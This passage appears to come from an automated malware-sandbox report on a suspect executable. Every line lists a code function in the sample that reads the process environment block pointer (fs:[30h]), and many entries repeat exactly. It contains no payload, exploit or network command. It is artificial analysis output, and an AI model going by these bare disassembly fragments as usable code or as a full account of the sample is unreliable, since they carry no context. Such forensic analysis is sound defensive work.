              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C25E0 mov eax, dword ptr fs:[00000030h]3_2_010C25E0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F8402 mov eax, dword ptr fs:[00000030h]3_2_010F8402
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F8402 mov eax, dword ptr fs:[00000030h]3_2_010F8402
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F8402 mov eax, dword ptr fs:[00000030h]3_2_010F8402
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BE420 mov eax, dword ptr fs:[00000030h]3_2_010BE420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BE420 mov eax, dword ptr fs:[00000030h]3_2_010BE420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BE420 mov eax, dword ptr fs:[00000030h]3_2_010BE420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BC427 mov eax, dword ptr fs:[00000030h]3_2_010BC427
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FA430 mov eax, dword ptr fs:[00000030h]3_2_010FA430
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0117A456 mov eax, dword ptr fs:[00000030h]3_2_0117A456
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E245A mov eax, dword ptr fs:[00000030h]3_2_010E245A
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010B645D mov eax, dword ptr fs:[00000030h]3_2_010B645D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114C460 mov ecx, dword ptr fs:[00000030h]3_2_0114C460
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EA470 mov eax, dword ptr fs:[00000030h]3_2_010EA470
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EA470 mov eax, dword ptr fs:[00000030h]3_2_010EA470
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EA470 mov eax, dword ptr fs:[00000030h]3_2_010EA470
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0117A49A mov eax, dword ptr fs:[00000030h]3_2_0117A49A
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114A4B0 mov eax, dword ptr fs:[00000030h]3_2_0114A4B0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C64AB mov eax, dword ptr fs:[00000030h]3_2_010C64AB
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F44B0 mov ecx, dword ptr fs:[00000030h]3_2_010F44B0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C04E5 mov ecx, dword ptr fs:[00000030h]3_2_010C04E5
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FC700 mov eax, dword ptr fs:[00000030h]3_2_010FC700
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C0710 mov eax, dword ptr fs:[00000030h]3_2_010C0710
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F0710 mov eax, dword ptr fs:[00000030h]3_2_010F0710
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113C730 mov eax, dword ptr fs:[00000030h]3_2_0113C730
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FC720 mov eax, dword ptr fs:[00000030h]3_2_010FC720
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FC720 mov eax, dword ptr fs:[00000030h]3_2_010FC720
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F273C mov eax, dword ptr fs:[00000030h]3_2_010F273C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F273C mov ecx, dword ptr fs:[00000030h]3_2_010F273C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F273C mov eax, dword ptr fs:[00000030h]3_2_010F273C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102750 mov eax, dword ptr fs:[00000030h]3_2_01102750
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102750 mov eax, dword ptr fs:[00000030h]3_2_01102750
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01144755 mov eax, dword ptr fs:[00000030h]3_2_01144755
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F674D mov esi, dword ptr fs:[00000030h]3_2_010F674D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F674D mov eax, dword ptr fs:[00000030h]3_2_010F674D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F674D mov eax, dword ptr fs:[00000030h]3_2_010F674D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114E75D mov eax, dword ptr fs:[00000030h]3_2_0114E75D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C0750 mov eax, dword ptr fs:[00000030h]3_2_010C0750
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C8770 mov eax, dword ptr fs:[00000030h]3_2_010C8770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116678E mov eax, dword ptr fs:[00000030h]3_2_0116678E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C07AF mov eax, dword ptr fs:[00000030h]3_2_010C07AF
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011747A0 mov eax, dword ptr fs:[00000030h]3_2_011747A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CC7C0 mov eax, dword ptr fs:[00000030h]3_2_010CC7C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011407C3 mov eax, dword ptr fs:[00000030h]3_2_011407C3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E27ED mov eax, dword ptr fs:[00000030h]3_2_010E27ED
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E27ED mov eax, dword ptr fs:[00000030h]3_2_010E27ED
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E27ED mov eax, dword ptr fs:[00000030h]3_2_010E27ED
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114E7E1 mov eax, dword ptr fs:[00000030h]3_2_0114E7E1
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C47FB mov eax, dword ptr fs:[00000030h]3_2_010C47FB
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C47FB mov eax, dword ptr fs:[00000030h]3_2_010C47FB
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102619 mov eax, dword ptr fs:[00000030h]3_2_01102619
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113E609 mov eax, dword ptr fs:[00000030h]3_2_0113E609
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C262C mov eax, dword ptr fs:[00000030h]3_2_010C262C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010DE627 mov eax, dword ptr fs:[00000030h]3_2_010DE627
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F6620 mov eax, dword ptr fs:[00000030h]3_2_010F6620
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F8620 mov eax, dword ptr fs:[00000030h]3_2_010F8620
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010DC640 mov eax, dword ptr fs:[00000030h]3_2_010DC640
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FA660 mov eax, dword ptr fs:[00000030h]3_2_010FA660
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FA660 mov eax, dword ptr fs:[00000030h]3_2_010FA660
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118866E mov eax, dword ptr fs:[00000030h]3_2_0118866E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118866E mov eax, dword ptr fs:[00000030h]3_2_0118866E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F2674 mov eax, dword ptr fs:[00000030h]3_2_010F2674
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C4690 mov eax, dword ptr fs:[00000030h]3_2_010C4690
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C4690 mov eax, dword ptr fs:[00000030h]3_2_010C4690
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FC6A6 mov eax, dword ptr fs:[00000030h]3_2_010FC6A6
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F66B0 mov eax, dword ptr fs:[00000030h]3_2_010F66B0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FA6C7 mov ebx, dword ptr fs:[00000030h]3_2_010FA6C7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FA6C7 mov eax, dword ptr fs:[00000030h]3_2_010FA6C7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113E6F2 mov eax, dword ptr fs:[00000030h]3_2_0113E6F2
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113E6F2 mov eax, dword ptr fs:[00000030h]3_2_0113E6F2
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113E6F2 mov eax, dword ptr fs:[00000030h]3_2_0113E6F2
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113E6F2 mov eax, dword ptr fs:[00000030h]3_2_0113E6F2
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011406F1 mov eax, dword ptr fs:[00000030h]3_2_011406F1
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011406F1 mov eax, dword ptr fs:[00000030h]3_2_011406F1
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114C912 mov eax, dword ptr fs:[00000030h]3_2_0114C912
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010B8918 mov eax, dword ptr fs:[00000030h]3_2_010B8918
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010B8918 mov eax, dword ptr fs:[00000030h]3_2_010B8918
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113E908 mov eax, dword ptr fs:[00000030h]3_2_0113E908
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113E908 mov eax, dword ptr fs:[00000030h]3_2_0113E908
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114892A mov eax, dword ptr fs:[00000030h]3_2_0114892A
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0115892B mov eax, dword ptr fs:[00000030h]3_2_0115892B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01140946 mov eax, dword ptr fs:[00000030h]3_2_01140946
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01194940 mov eax, dword ptr fs:[00000030h]3_2_01194940
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114C97C mov eax, dword ptr fs:[00000030h]3_2_0114C97C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E6962 mov eax, dword ptr fs:[00000030h]3_2_010E6962
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E6962 mov eax, dword ptr fs:[00000030h]3_2_010E6962
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E6962 mov eax, dword ptr fs:[00000030h]3_2_010E6962
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01164978 mov eax, dword ptr fs:[00000030h]3_2_01164978
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01164978 mov eax, dword ptr fs:[00000030h]3_2_01164978
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0110096E mov eax, dword ptr fs:[00000030h]3_2_0110096E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0110096E mov edx, dword ptr fs:[00000030h]3_2_0110096E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0110096E mov eax, dword ptr fs:[00000030h]3_2_0110096E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C09AD mov eax, dword ptr fs:[00000030h]3_2_010C09AD
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C09AD mov eax, dword ptr fs:[00000030h]3_2_010C09AD
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011489B3 mov esi, dword ptr fs:[00000030h]3_2_011489B3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011489B3 mov eax, dword ptr fs:[00000030h]3_2_011489B3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011489B3 mov eax, dword ptr fs:[00000030h]3_2_011489B3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118A9D3 mov eax, dword ptr fs:[00000030h]3_2_0118A9D3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011569C0 mov eax, dword ptr fs:[00000030h]3_2_011569C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA9D0 mov eax, dword ptr fs:[00000030h]3_2_010CA9D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA9D0 mov eax, dword ptr fs:[00000030h]3_2_010CA9D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA9D0 mov eax, dword ptr fs:[00000030h]3_2_010CA9D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA9D0 mov eax, dword ptr fs:[00000030h]3_2_010CA9D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA9D0 mov eax, dword ptr fs:[00000030h]3_2_010CA9D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA9D0 mov eax, dword ptr fs:[00000030h]3_2_010CA9D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F49D0 mov eax, dword ptr fs:[00000030h]3_2_010F49D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114E9E0 mov eax, dword ptr fs:[00000030h]3_2_0114E9E0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F29F9 mov eax, dword ptr fs:[00000030h]3_2_010F29F9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F29F9 mov eax, dword ptr fs:[00000030h]3_2_010F29F9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114C810 mov eax, dword ptr fs:[00000030h]3_2_0114C810
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116483A mov eax, dword ptr fs:[00000030h]3_2_0116483A
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116483A mov eax, dword ptr fs:[00000030h]3_2_0116483A
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E2835 mov eax, dword ptr fs:[00000030h]3_2_010E2835
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E2835 mov eax, dword ptr fs:[00000030h]3_2_010E2835
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E2835 mov eax, dword ptr fs:[00000030h]3_2_010E2835
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E2835 mov ecx, dword ptr fs:[00000030h]3_2_010E2835
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E2835 mov eax, dword ptr fs:[00000030h]3_2_010E2835
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E2835 mov eax, dword ptr fs:[00000030h]3_2_010E2835
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FA830 mov eax, dword ptr fs:[00000030h]3_2_010FA830
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D2840 mov ecx, dword ptr fs:[00000030h]3_2_010D2840
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C4859 mov eax, dword ptr fs:[00000030h]3_2_010C4859
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C4859 mov eax, dword ptr fs:[00000030h]3_2_010C4859
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F0854 mov eax, dword ptr fs:[00000030h]3_2_010F0854
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01156870 mov eax, dword ptr fs:[00000030h]3_2_01156870
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01156870 mov eax, dword ptr fs:[00000030h]3_2_01156870
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114E872 mov eax, dword ptr fs:[00000030h]3_2_0114E872
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114E872 mov eax, dword ptr fs:[00000030h]3_2_0114E872
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114C89D mov eax, dword ptr fs:[00000030h]3_2_0114C89D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C0887 mov eax, dword ptr fs:[00000030h]3_2_010C0887
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE8C0 mov eax, dword ptr fs:[00000030h]3_2_010EE8C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011908C0 mov eax, dword ptr fs:[00000030h]3_2_011908C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FC8F9 mov eax, dword ptr fs:[00000030h]3_2_010FC8F9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FC8F9 mov eax, dword ptr fs:[00000030h]3_2_010FC8F9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118A8E4 mov eax, dword ptr fs:[00000030h]3_2_0118A8E4
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113EB1D mov eax, dword ptr fs:[00000030h]3_2_0113EB1D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113EB1D mov eax, dword ptr fs:[00000030h]3_2_0113EB1D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113EB1D mov eax, dword ptr fs:[00000030h]3_2_0113EB1D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113EB1D mov eax, dword ptr fs:[00000030h]3_2_0113EB1D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113EB1D mov eax, dword ptr fs:[00000030h]3_2_0113EB1D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113EB1D mov eax, dword ptr fs:[00000030h]3_2_0113EB1D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113EB1D mov eax, dword ptr fs:[00000030h]3_2_0113EB1D
